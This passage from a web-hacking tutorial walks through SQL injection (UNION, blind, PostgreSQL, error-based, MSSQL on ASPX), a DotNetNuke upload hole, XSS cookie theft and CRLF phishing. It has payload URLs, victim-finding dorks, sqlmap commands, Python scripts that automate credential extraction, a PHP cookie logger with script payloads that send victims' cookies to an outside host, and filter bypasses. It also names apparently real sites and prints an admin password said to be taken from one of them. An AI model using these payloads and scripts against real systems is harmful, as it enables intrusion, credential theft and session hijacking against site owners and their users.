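The UNION-based steps of section [VI] (ORDER BY column counting, group_concat() to pull every table name or every username:password pair in one request) and the one-value-per-request NOT IN walk of this MSSQL section are the same procedure with different amounts of output per request. The following is an added example, not code from the original post, that automates both against a constructed sqlite3 database so it runs offline. The table and column names, the rows and the column count are assumptions for the illustration; sqlite keeps its catalogue in sqlite_master rather than information_schema, and spells string concatenation with || instead of concat(), which is the only translation involved.

```python
import sqlite3

# Constructed in-memory target standing in for book.php?id=141. Table and
# column names and rows are assumptions for this illustration.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE book  (id INTEGER, title TEXT, author TEXT, year INTEGER,
                    isbn TEXT, price REAL, stock INTEGER);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO book  VALUES (141, 'A Book', 'Someone', 2008, '0-00', 9.5, 3);
INSERT INTO users VALUES (1, 'sebrezovski', '1533562');
INSERT INTO users VALUES (2, 'seratum', 'seratum');
""")


def page(book_id):
    """The vulnerable endpoint: the id is glued into the query. Returns the
    rows the page would render, or None when the query errors (the page
    'breaks', which is the signal the tutorial watches for)."""
    try:
        return conn.execute("SELECT * FROM book WHERE id=" + book_id).fetchall()
    except sqlite3.OperationalError:
        return None


def count_columns(max_cols=64):
    """ORDER BY n probe as a binary search: the largest n that does not
    break the page is the number of columns in the query."""
    if page("141 ORDER BY 1--") is None:
        return 0
    lo, hi = 1, max_cols
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if page("141 ORDER BY %d--" % mid) is not None:
            lo = mid
        else:
            hi = mid - 1
    return lo


def union_extract(expr, from_clause="", ncols=7, col=2):
    """Put `expr` in the reflected column of a UNION SELECT; the id is
    negated so only the UNION row comes back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = expr
    rows = page("-141 UNION SELECT " + ",".join(cols) + " " + from_clause + "--")
    return rows[0][col - 1] if rows else None


def table_names_one_request(ncols=7):
    """MySQL style: group_concat() returns every name in a single request."""
    names = union_extract("group_concat(name)",
                          "FROM sqlite_master WHERE type='table'", ncols)
    return sorted(names.split(",")) if names else []


def table_names_one_by_one(ncols=7):
    """MSSQL style: one value per request, excluding what is already known
    with NOT IN until nothing comes back."""
    known = []
    while True:
        exclude = ""
        if known:
            exclude = " AND name NOT IN (%s)" % ",".join("'%s'" % k for k in known)
        name = union_extract("name", "FROM sqlite_master WHERE type='table'" + exclude, ncols)
        if name is None:
            return sorted(known)
        known.append(name)


def dump_credentials(ncols=7):
    """The group_concat(username,0x3a,password) step, with || for concat()."""
    data = union_extract("group_concat(username || ':' || password)", "FROM users", ncols)
    return sorted(data.split(",")) if data else []
```

On a real target page() is an HTTP request and the "error or not" signal is whether the page renders; the rest of the logic is unchanged. The NOT IN walk costs one request per value but has no output-length limit, which is why it is also the fallback when group_concat() output is truncated by group_concat_max_len.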
[VIII] Blind SQL Injection

1) Blind SQL Injection?

The difference between SQL Injection and Blind SQL Injection is that in the blind case the page prints no errors and no table names, column names or data. That is why it is called blind. All you have is whether part of the page (an image, text, etc.) disappears or not, i.e. whether the condition you injected was true or false. In blind injection the trailing comment (-- or /* */) is usually not needed.

2) Site vulnerability check

We have the link:

http://www.site.com/index.php?id=1

We add and 1=2

http://www.site.com/index.php?id=1+and+1=2

If any part of the page disappears (and comes back with and 1=1), the site is vulnerable.
3) Finding database version

As said, nothing is printed, so we ask yes/no questions. We guess that the version is 4: if part of the page disappears the version is not 4, if everything stays as it should the version is 4. We use @@version:

http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4

If the page loads as it should the version is 4; if not, we try:

http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5
4) MySQL user

First we check whether a subquery with select works, because it is sometimes blocked:

http://www.site.com/index.php?id=1+and+(select+1)=1

If the page loads normally we can use select, otherwise we cannot. Now we check whether we can read mysql.user (the original post had a typo, mysq.user, and selected *, which fails in a comparison because the subquery must return a single column):

http://www.site.com/index.php?id=1+and+(SELECT+1+from+mysql.user+limit+0,1)=1

As with everything else, if the page loads normally we have access to mysql.user; if not, we don't. mysql.user is useful for password hashes and for checking the FILE privilege needed by load_file() and INTO OUTFILE.
5) Finding table name

To find table names we have to guess. First the table, then its columns.
We try different names in the link; if the page loads normally the table exists and has at least one row (the original post used Croatian placeholders, ime_tabele for table_name and ime_kolone for column_name):

http://www.site.com/index.php?id=1+and+(select+1+from+table_name+limit+0,1)=1

Our objective is the admin table, so try names such as:

admin
administrator
member
login
members
adm
user
users
tbl_admin
6) Finding column name

Now that we have the table we want, we find its columns the same way: if the page loads normally the column exists. We need login data, so commonly the columns are:

username
admin
admin_username
uname
user
nick
password
pword
admin_password
pw
pass

The link we use for columns is:

http://www.site.com/index.php?id=1+and+(select+substring(concat(1,column_name),1,1)+from+table_name+limit+0,1)=1

concat(1,column_name) always starts with 1 when the column exists, so the comparison is true; a wrong column name is a SQL error and the page breaks.
    7) Taking data from columns

    In blind SQL injection this is the slowest and most tedious part. We need an ASCII table:
    http://www.asciitable.com/

    Only the DEC and CHR columns matter. We extract the username one character at a time: take a character's decimal code (for A it is 65) and ask the database whether the character at a given position has a code greater than that number:
    http://www.site.com/index.php?id=1+and+ascii(substring((select+column_name+from+table_name+limit+0,1),1,1))>64

    Replace column_name and table_name with the names found above. If the page loads normally, the first character's code is greater than 64; keep narrowing the number (for example 64, 96, 112, ...) until the exact code is known, then look it up in the ASCII table. Always testing the middle of the remaining range (a binary search) needs about seven requests per character instead of up to 127. To get the second character, change substring(...,1,1) to substring(...,2,1), and so on. The password is extracted the same way. So after a long, long time we have the username and password. If there are more users and you want their passwords too, either move to the next row with +limit+1,1 instead of +limit+0,1, or pick the row with a WHERE clause:
    http://www.site.com/index.php?id=1+and+ascii(substring((select+column_name+from+table_name+where+column_name=something+limit+0,1),1,1))>64

    For the WHERE we usually use id, but any column that identifies the row works, e.g. for id:
    http://www.site.com/index.php?id=1+and+ascii(substring((select+column_name+from+table_name+where+id=1+limit+0,1),1,1))>64
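    Here is the whole procedure from sections 5 to 7 automated, as an added example that is not part of the original tutorial. It runs the same boolean oracle against an in-memory SQLite database instead of a remote site, so the vulnerable page, its posts and users tables and the "Posted 3-3-2008" marker text are all constructed for the demo. It goes a little beyond the text in two ways: it binary-searches each character instead of guessing codes by hand, and it walks the rows with limit/offset. SQLite spells the MySQL functions ascii()/substring()/limit 0,1 as unicode()/substr()/limit 1 offset 0 and compares '1' to 1 strictly; the comments give the MySQL form at each step.

```python
import sqlite3

MARKER = "Posted 3-3-2008"   # text on the page only when the WHERE clause is true


def build_db():
    """Constructed sample database standing in for the target's MySQL server."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts(id INTEGER, title TEXT);
        INSERT INTO posts VALUES (1, 'Posted 3-3-2008');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
        INSERT INTO users VALUES (2, 'bob',   'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db


class VulnerablePage:
    """Simulates index.php?id=... gluing the parameter straight into the query."""

    def __init__(self, db):
        self.db = db
        self.requests = 0          # counts how many page loads an attack costs

    def get(self, id_param):
        self.requests += 1
        sql = "SELECT title FROM posts WHERE id=" + id_param   # the injection point
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error:
            return "Database error"                 # query broke: marker gone
        return row[0] if row else "No such post"    # condition false: marker gone


def oracle(page, condition):
    """True when 'id=1 and <condition>' still renders the marker."""
    return MARKER in page.get("1 and " + condition)


def table_exists(page, table):
    # MySQL form: and (select 1 from <table> limit 0,1)=1  (needs at least one row)
    return oracle(page, f"(select 1 from {table} limit 1 offset 0)=1")


def column_exists(page, table, column):
    # MySQL form: and (select substring(concat(1,<col>),1,1) from <table> limit 0,1)=1
    # SQLite will not treat '1' and 1 as equal, hence the quoted '1' here.
    return oracle(page, f"(select substr(1||{column},1,1) from {table} limit 1 offset 0)='1'")


def extract_char(page, subquery, pos):
    """Binary-search the code of character `pos` of the subquery's result.
    MySQL form: and ascii(substring((<subquery>),<pos>,1))><N>"""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(page, f"unicode(substr(({subquery}),{pos},1))>{mid}"):
            lo = mid + 1      # character is above mid
        else:
            hi = mid          # mid or below; past the end NULL>mid is never true, so lo stays 0
    return chr(lo)            # chr(0) means the string has ended


def extract_string(page, subquery, max_len=80):
    """Pull one value out character by character, position by position."""
    out = ""
    for pos in range(1, max_len + 1):
        c = extract_char(page, subquery, pos)
        if c == "\0":
            break
        out += c
    return out


def dump_logins(page, table="users", user_col="username", pass_col="password", max_rows=20):
    """Walk the rows with limit/offset, as the tutorial does with limit 0,1 then limit 1,1."""
    rows = []
    for offset in range(max_rows):
        # MySQL form: select concat(<user_col>,0x3a,<pass_col>) from <table> limit <offset>,1
        sub = f"select {user_col}||':'||{pass_col} from {table} limit 1 offset {offset}"
        value = extract_string(page, sub)
        if not value:          # no row at this offset: NULL comes back as an empty string
            break
        rows.append(value)
    return rows


if __name__ == "__main__":
    page = VulnerablePage(build_db())
    print("table users exists:", table_exists(page, "users"))
    print("column password exists:", column_exists(page, "users", "password"))
    for line in dump_logins(page):
        print(line)
    print("requests used:", page.requests)
```

    Each character costs exactly seven requests with the 0..127 search range, plus seven more to detect the end of the string, which is why the tutorial's next section hands the job to sqlmap. Against a real site, replace VulnerablePage.get with an HTTP fetch of the URL with the payload URL-encoded.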




    8) Taking data from columns using sqlmap

    As you have noticed, getting data out of columns by hand takes a lot of time, so I suggest using sqlmap.
    Download:
    http://sqlmap.org/

    Python download:
    http://www.python.org/download/

    Now find the directory where sqlmap is located.
    Start > Run > cmd, then change into the sqlmap directory with cd.
    The command to start sqlmap and fetch data with blind SQL injection on Windows is:
    sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_column,0x3a,name_password_column) from table_name)"

    NOTE: on Unix put python in front of sqlmap.py, so it looks like:
    python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_column,0x3a,name_password_column) from table_name)"

    If there are more users, as said above, pick one by id:
    sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_column,0x3a,name_password_column) from table_name where id=1)"

    After -u you put the link.
    After -p you put the parameter that is vulnerable (in our case id).
    -a loads a random User-Agent from txt/user-agents.txt.
    -v1 is the verbosity level.
    After --string you put some text that sqlmap uses to tell a true condition from a false one (a part of the page that disappears when the condition is false).
    -e is the query we want to execute. In our case this one:

    SELECT concat(name_username_column,0x3a,name_password_column) from table_name where id=1

    0x3a is a colon, so username and password come back as one username:password string. The -a and -e switches are from the old sqlmap 0.x releases this command was written for; in current sqlmap the same options are spelled --random-agent and --sql-query, while -u, -p, -v and --string are unchanged.

    [IX] PostgreSQL Injection

    1) PostgreSQL Injection?

    PostgreSQL injection is almost the same as the SQL injection above; the difference is that the backend database is PostgreSQL, not MySQL. It is a bit more complicated than the usual SQL injection and uses some other functions, as you will see.

    2) Finding vulnerable sites

    Finding vulnerable sites is the same as for usual SQL injection, which means we can use Google dorks.
    Here are some:
    inurl:faq.php?id=
    inurl:event.php?id=
    inurl:index.php?id=

    3) Site vulnerability check

    You found a site that may be vulnerable. To check, add ' at the end of the link:
    http://www.link.com/page.php?page=1'

    If on the page we get:
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

    or some part of the page disappears, the site is vulnerable.

    4) Finding number of columns

    Now that we know the site is vulnerable we need the column count. This time we do it with UNION.
    Our link:
    http://www.link.com/page.php?page=1+union+select+all+null--+-

    If we get the error "each UNION query must have the same number of columns", the original query selects more columns than we supplied, so we add another null:
    http://www.link.com/page.php?page=1+union+select+all+null,null,null,null--+-

    (The original had "from dual" on this line; that is an Oracle/MySQL table and does not exist in PostgreSQL, so leave it out.) Keep adding nulls until the page loads normally. If it loads with 6 nulls and errors with 7, the query has 6 columns, which means 6 nulls.

    5) Finding vulnerable columns

    Finding a usable column is easy. null is compatible with every column type, so we replace one null at a time with a function that returns a string; if its output shows up on the page, that column is displayed, and if nothing appears, the column is not usable. So:
    http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-

    If nothing is listed, this column is not usable: put the null back and move on to the next one. Note that PostgreSQL requires the types of each UNION column to match, so a string function only works in a position whose original column is text; in a numeric position you get "UNION types ... cannot be matched" instead of output.

    6) Finding database version

    We do this with the version() function. This link shows the version:
    http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-

    We get something like:
    PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit

    7) Finding table name

    Same as usual SQL injection, the only difference is that instead of column numbers we have nulls.
    So it looks like:
    http://www.link.com/page.php?page=1+union+select+all+table_name,null,null,null+from+information_schema.tables--+-

    This lists table names (information_schema.tables holds only table names; the columns come from information_schema.columns in the next step). If the page shows only one row at a time, walk through the tables by appending limit 1 offset N to the query.

    8) Finding column name

    Also easy, there is no big difference. It looks like this:
    http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name='users'--+-

    Sometimes the quotes around users are filtered or escaped, so instead we write the string as a chain of CHR() calls with the decimal ASCII code of each letter. You can get the codes from this site:
    http://easycalculation.com/ascii-hex.php

    For users that is 117 115 101 114 115, so the link becomes:
    http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name=CHR(117)||CHR(115)||CHR(101)||CHR(114)||CHR(115)--+-

    (The original had "table_name||CHR(61)||users" here, which concatenates the column with "=" instead of comparing it; CHR() replaces the quoted string, not the = sign.)

    9) Taking data from columns

    Also almost the same as usual SQL injection:
    http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-

    CHR(58) is a colon, so both columns come out as username:password in the one displayed column.
    [X] Error-based PostgreSQL Injection

    1) Error-based PostgreSQL Injection?

    Error-based PostgreSQL injection is a web attack against a PostgreSQL backend. The difference from the UNION method is that the page does not have to display anything for us: as the name says, the attack is based on errors, and every result (tables, columns, values from columns, etc.) comes back inside an error message, one value per request.

    2) Finding vulnerable sites

    Use Google dorks:
    inurl:faq.php?id=
    inurl:event.php?id=
    inurl:index.php?id=

    3) Site vulnerability check

    Add ' at the end of the link:
    http://www.link.com/page.php?page=1'

    If we get:
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

    the site is vulnerable.

    4) Finding database version

    Use the version() function. In this type of attack the query looks a bit more complicated than usual SQL injection, so don't get confused:
    http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--

    The trick is that casting a non-numeric string to int fails, and PostgreSQL quotes the offending value in the error. If the query runs you get this on the page:
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

    from which we get the database version:
    PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit
    5) Finding table name

    As said at the start, we cannot get all tables in one go, so we use LIMIT and OFFSET.

    OFFSET says which result from the database we want to list.
    Our link:
    http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+0)+as+int)--

    On the page we get this error:
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type"

    so we have a table pg_type.

    To get the next table we change the offset to 1:
    http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+1)+as+int)--

    and we get a table like pg_attribute. (The system catalog tables come first; add where table_schema='public' to skip them and list only the application's own tables.)

    6) Finding column name

    First convert the table name into decimal ASCII codes. We use:
    http://easycalculation.com/ascii-hex.php

    Type the string admin and you get the codes:
    97 100 109 105 110

    We turn this into a CHR() chain (the + signs are just URL-encoded spaces):
    CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)

    Now we put it in as the table name and get the columns:
    http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+where+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+offset+0)+as+int)--

    and we get the column id. We keep increasing the offset until the page comes back without an error (on this site it sends you to the home page): the subquery then returns no row, cast(NULL as int) does not fail, and that means there are no more columns in the table.

    7) Taking data from columns

    We found the columns username and password and now want the data from them:
    http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limit+1+offset+0)+as+int)--

    and we get:
    admin:21232f297a57a5a743894a0e4a801fc3

    CHR(58) is a colon (:) and we use it to get two columns at the same time. (That hash is an unsalted MD5; this particular one is md5("admin").)

    NOTE (for the rest of the tutorial): from here on I'm not going to explain things in detail, because you should be able to figure it out by now, so I will use only pictures and code.

    [XI] SQL Injection on ASPX

    1) Site vulnerability check

    Vulnerable link:
    http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton

    We add order by 1--:
    http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--

    If you get a page error, go to:
    http://pothys.com/ImageDisplay.aspx?Id=1535

    2) Finding column name

    Go to:
    http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1

    Screenshot: s13.postimage.org/6ivvov0iv/img2.jpg

    HAVING without a GROUP BY makes MS SQL Server complain that the first selected column "is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause", and that error names the column.

    3) Finding table name
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))

    Screenshot: s7.postimage.org/qdv7qr5uz/img3.jpg

    convert(int, ...) fails on a text value and the error message quotes it, the same idea as the PostgreSQL cast() above. We want the admin table, so we exclude the tables already seen and ask again:
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))

    Screenshot: s15.postimage.org/sp0nmn9hn/img4.jpg

    The admin table name is AdminMaster.

    4) Finding columns in admin table

    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))

    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))

    Column names:

    Screenshot: s14.postimage.org/pwr77oewh/img5.jpg

    Screenshot: s17.postimage.org/5i2zlmuu7/img6.jpg

    5) Finding username and password

    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))

    Screenshot: s15.postimage.org/hr7rnfeff/img7.jpg

    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))

    Screenshot: s11.postimage.org/kvxwwklyr/img8.jpg

    Username: admin
    Password: pothys!@#
    [XII] DotNetNuke

    DNN (DotNetNuke) ships a link gallery page as part of its FCKeditor provider, where you can upload files to the site and keep pictures in an "online gallery". That gallery has a hole that lets you upload files with extensions such as *.gif, *.jpg, *.pdf, *.txt, *.swf...

    Google dork to find vulnerable sites:
    inurl:fck/fcklinkgallery.aspx

    I'm going to use this site:
    http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx

    If the page loads, it looks like this:

    Screenshot: s18.postimage.org/erglobawp/image.jpg

    which means we can continue. Now we choose option 3 -> File (A File On Your Site) and type this JavaScript into the address bar to trigger the upload control:
    javascript:__doPostBack('ctlURL$cmdUpload','')

    A Choose File field and an Upload Selected File button show up.

    *on this site the text colour matches the background, so you will have to select the whole page (CTRL+A) to see the upload button.

    Screenshot: s17.postimage.org/6meo81nrz/image.jpg

    Upload the file and access it at sitelink.com/portals/0/filename.extension
    ->
    http://kellyballancephotography.com/portals/0/config.txt
    [XIII] XSS

    1) XSS?

    XSS lets the attacker execute JavaScript in other users' browsers. XSS is short for Cross Site Scripting.
    You can use XSS in many ways: simply executing JavaScript commands, or stealing cookies. We then put the stolen cookie into our own browser so we can log in somewhere without the password.

    2) Required stuff

    Mozilla Firefox:
    http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB

    Add-on Firebug:
    https://addons.mozilla.org/en-US/firefox/addon/firebug/

    Add-on FireCookie:
    https://addons.mozilla.org/en-US/firefox/addon/firecookie/

    Add-on Live HTTP Headers:
    https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi

    Basic knowledge of JavaScript is recommended.

    3) Testing XSS vulnerability

    Sites where we can use this method are those with a text input and a submit button, and those where a GET parameter is printed back into the page.
    e.g. of the GET method:
    www.site.com/index.php?page=<script>alert("XSS")</script>

    The command to check the site is:
    <script>alert("XSS")</script>

    Now I will explain what this command does:
    <script> - opening script tag
    alert("XSS") - a window pops up saying "XSS"
    </script> - closing script tag

    4) XSS types

    Cookie Stealing - we steal the cookie of some user (commonly the admin) and put it in our own browser, so when we open the site we are already logged in.
    Cross-Site Request Forgery - we make the victim's browser send requests of our choosing without knowing their username or password.
    XSS Worms - an "evil" script that can spread over the whole site by itself.
    Door-Forwarding - the script creates an iframe that exploits the browser or starts the download of some virus, RAT, keylogger, stealer, etc.
    Keylogging - you know what keylogging is.

    5) Cookie Stealing

    For cookie stealing we need:
    -a vulnerable site
    -a web host for the scripts
    -a PHP script

    Put this script on some hosting:

    cookie.php
    <?php
    // Cookie logger: appends whatever arrives in ?cookie= to cookielog.txt.
    // The original used $HTTP_GET_VARS, which was removed in PHP 5.4; $_GET replaces it.
    $cookie = $_GET["cookie"];
    $file = fopen('cookielog.txt', 'a');
    fwrite($file, $cookie."\n");
    fclose($file);
    ?>

    Script to run on the vulnerable site (any one of these):
    <script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
    or
    <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
    or
    <script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie);</script>
    or
    <script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>

    How does this work?
    When some user opens the page with your cookie logger in it, their cookie is saved to the log. Then we take the cookie and use it. Here is how:

    1) Open Mozilla
    2) Open the Firebug add-on

    Screenshot: s9.postimage.org/r42pchyjz/aa2.jpg

    3) Type in the cookie name and value. Here is one:
    PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898

    the cookie name is PHPSESSID
    the cookie value is db3e4e100ab6bb912de1b80c4eed7898

    Note that a cookie set with the HttpOnly flag is not readable from document.cookie, so this logger gets nothing from it.

    6) Filter bypassing

    1) Deleting the script tag
    e.g. if we type <script>alert("XSS")</script> and only alert("XSS") comes out, the filter deletes the <script> and </script> tags.
    Here is how to bypass that when the filter removes the tags only once: instead of <script>alert("XSS")</script> we send <scr<script>ipt>alert("XSS")</scr</script>ipt>; after the inner tags are removed, the outer ones are left intact.

    2) magic_quotes
    Explained here:
    http://en.wikipedia.org/wiki/Magic_quotes

    If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script>, that is magic_quotes (quotes are escaped with a backslash).
    It is a bit harder to bypass; the way around it is String.fromCharCode, which builds a string from decimal character codes, so the payload needs no quotes at all.
    Example: the link to our cookie logger is http://link.com/cookie.php, so instead of <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> we use:
    <scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie;</scr</script>ipt>

    This works because the backslash is only added in front of ' and ", and a list of integers needs neither.

    The decimal codes for http://www.link.com/cookie.php?cookie= were produced with this tool:
    Ascii to Decimal
    http://pookey.co.uk/binary.php
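    The two filter bypasses above and the CHR() trick from the PostgreSQL sections come down to the same two things: a filter that strips a token in a single pass, and an encoder that writes a string without quote characters. This added example (mine, not from the tutorial) shows both in Python: a one-pass <script> remover with the <scr<script>ipt> payload surviving it, a repeated filter and a hardened output encoder that do not, and encoders that produce the String.fromCharCode(...) literal and the PostgreSQL CHR()||CHR() chain from a plain string. The function names and the logger URL are mine.

```python
import html
import re

SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)


def strip_script_once(user_input: str) -> str:
    """The weak filter from 6.1: removes every <script> / </script> in one pass."""
    return SCRIPT_TAG.sub("", user_input)


def strip_script_repeat(user_input: str) -> str:
    """Same filter applied until nothing changes; beats the nesting trick but is still a blacklist."""
    previous = None
    while previous != user_input:
        previous, user_input = user_input, SCRIPT_TAG.sub("", user_input)
    return user_input


def render_safely(user_input: str) -> str:
    """Hardened form: encode for the HTML text context instead of hunting for tags."""
    return html.escape(user_input, quote=True)


def contains_script_tag(page_fragment: str) -> bool:
    """Would a browser see a real <script> element in this output?"""
    return SCRIPT_TAG.search(page_fragment) is not None


def js_from_char_code(s: str) -> str:
    """String.fromCharCode(...) literal for s: no quotes, so magic_quotes has nothing to escape."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


def pg_chr_chain(s: str) -> str:
    """PostgreSQL CHR(..)||CHR(..) expression for s, for WHERE clauses when ' is filtered."""
    return "||".join(f"CHR({ord(c)})" for c in s)


def cookie_stealer_payload(logger_url: str) -> str:
    """Section 6.2 payload: nested tags to survive a one-pass filter, fromCharCode to avoid quotes."""
    return ("<scr<script>ipt>location.href=" + js_from_char_code(logger_url + "?cookie=")
            + "+document.cookie;</scr</script>ipt>")


if __name__ == "__main__":
    payload = cookie_stealer_payload("http://www.link.com/cookie.php")   # assumed logger URL
    print("one-pass filter output:", strip_script_once(payload))
    print("repeated filter output:", strip_script_repeat(payload))
    print("escaped output        :", render_safely(payload))
    print("PostgreSQL literal    :", pg_chr_chain("users"))
```

    The repeated filter only closes the one trick shown here; a payload such as <img src=x onerror=...> never contains the word script and passes it untouched, which is why the output encoder, not the tag blacklist, is the fix to keep.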

    [XIV] CRLF

    1) CRLF?

    Short for Carriage Return and Line Feed. CRLF injection is very easy to use: we are simply adding a new line (\r\n, or just \n) inside input that is supposed to stay on one line.

    2) Vulnerable places

    Vulnerable places are anywhere a single-line input ends up in line-oriented output (chat, log files, HTTP headers). In this tutorial I'm going to use a chat.

    3) Exploiting vulnerability and protection

    Let's say you send a message and the chat looks like this:
    1.4.2012 10:29 - fodex: Why login page is down?
    1.4.2012 10:29 - saiR: Look like somebody deleted login database.
    1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
    1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

    If the chat is vulnerable, it's going to look like this:
    1.4.2012 10:30 - saiR: Ok go ahead...
    1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

    We wrote the second message "from Admin" ourselves, but users will think the admin sent it and will log in to the site we gave them, where we log their credentials.

    Protection: strip or encode \r, \n and the other control characters from every message before it is stored or rendered, and escape for HTML separately; one does not cover the other.

    4) Vulnerable script

    e.g.
    <?php
    if(isset($_POST['send_message']))
    {
       if(!empty($_POST['message']))
       {
          // htmlspecialchars() only encodes &, <, > and quotes; newlines pass through
          // untouched, so a message containing \n is stored and shown as two chat lines.
          $message = htmlspecialchars($_POST['message']);
          // rest of the code to send the message
       }
    }
    ?>
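    The vulnerable handler above in Python form, next to a hardened one, as an added example that is not from the tutorial. The chat line format, the names and the forged message are the page's; the function names and the control-character pattern are mine, and the stored messages are built in the script rather than read from a real chat.

```python
import html
import re

# Anything that can end a line or fake one: CR, LF, the other C0 controls and DEL.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def format_line(stamp: str, user: str, message: str) -> str:
    """One chat line in the tutorial's format: '1.4.2012 10:30 - saiR: text'."""
    return f"{stamp} - {user}: {message}"


def store_message_vulnerable(stamp: str, user: str, raw: str) -> str:
    """Mirrors the PHP: htmlspecialchars() only, so a newline survives into the chat log."""
    return format_line(stamp, user, html.escape(raw, quote=True))


def store_message_hardened(stamp: str, user: str, raw: str) -> str:
    """Replace line breaks and other control characters first, then HTML-encode."""
    cleaned = CONTROL_CHARS.sub(" ", raw)
    return format_line(stamp, user, html.escape(cleaned, quote=True))


def render_chat(stored_lines) -> str:
    """The chat page: one stored entry per displayed row."""
    return "\n".join(stored_lines)


def forged_admin_message(stamp: str) -> str:
    """The payload from the tutorial: a real message plus a fake 'Admin' line after a newline."""
    return ("Ok go ahead...\n"
            + format_line(stamp, "Admin",
                          "You are right saiR login database is deleted. "
                          "Log in here till I get it back: http://vulnerablesite.com/login.php"))


if __name__ == "__main__":
    raw = forged_admin_message("1.4.2012 10:30")
    print("vulnerable chat:\n" + render_chat([store_message_vulnerable("1.4.2012 10:30", "saiR", raw)]))
    print("hardened chat:\n" + render_chat([store_message_hardened("1.4.2012 10:30", "saiR", raw)]))
```

    The same split applies to any line-oriented sink: a log writer or an HTTP header setter needs the control-character strip, and the HTML page needs the escape, and neither one substitutes for the other.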




    [XV] CSRF

    1) CSRF?

    Short for Cross Site Request Forgery. CSRF makes a logged-in user's browser send a request that the attacker chose, so an action is executed with the victim's session without the attacker ever knowing the username or password. It is often delivered through the same places as XSS, or through any URL the site fetches for other users, such as an avatar.

    2) Vulnerable places

